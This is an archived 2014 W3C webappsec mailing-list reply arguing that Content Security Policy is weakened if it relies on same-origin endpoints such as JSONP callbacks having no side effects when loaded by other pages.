- From: Michal Zalewski <lcamtuf@google.com>
- Date: Wed, 12 Feb 2014 07:42:31 -0800
- To: Mike West <mkwst@google.com>
- Cc: "Eduardo' Vela" <evn@google.com>, Brad Hill <bhill@paypal-inc.com>, Odin Hørthe Omdal <odinho@opera.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Adam Barth <w3c@adambarth.com>, Garrett Robinson <grobinson@mozilla.com>, Daniel Veditz <dveditz@mozilla.com>
> Happily, I'm not on Google's infra security team, so I can suggest that > Google should be more careful about a) scoping APIs to origins, and b) not > allowing arbitrary callbacks, while remaining blissfully unaware of the work > that would be involved in doing so. :) I think that making the value of CSP hinge on the assumption that nothing else you host in the origin will have any side effects if loaded somewhere else greatly diminishes its value to any medium-size web property. JSONP APIs are just an intuitive example, but I bet that there are dozens or hundreds of other opportunities across paypal.com, facebook.com, google.com, etc. /mz
Received on Wednesday, 12 February 2014 15:43:21 UTC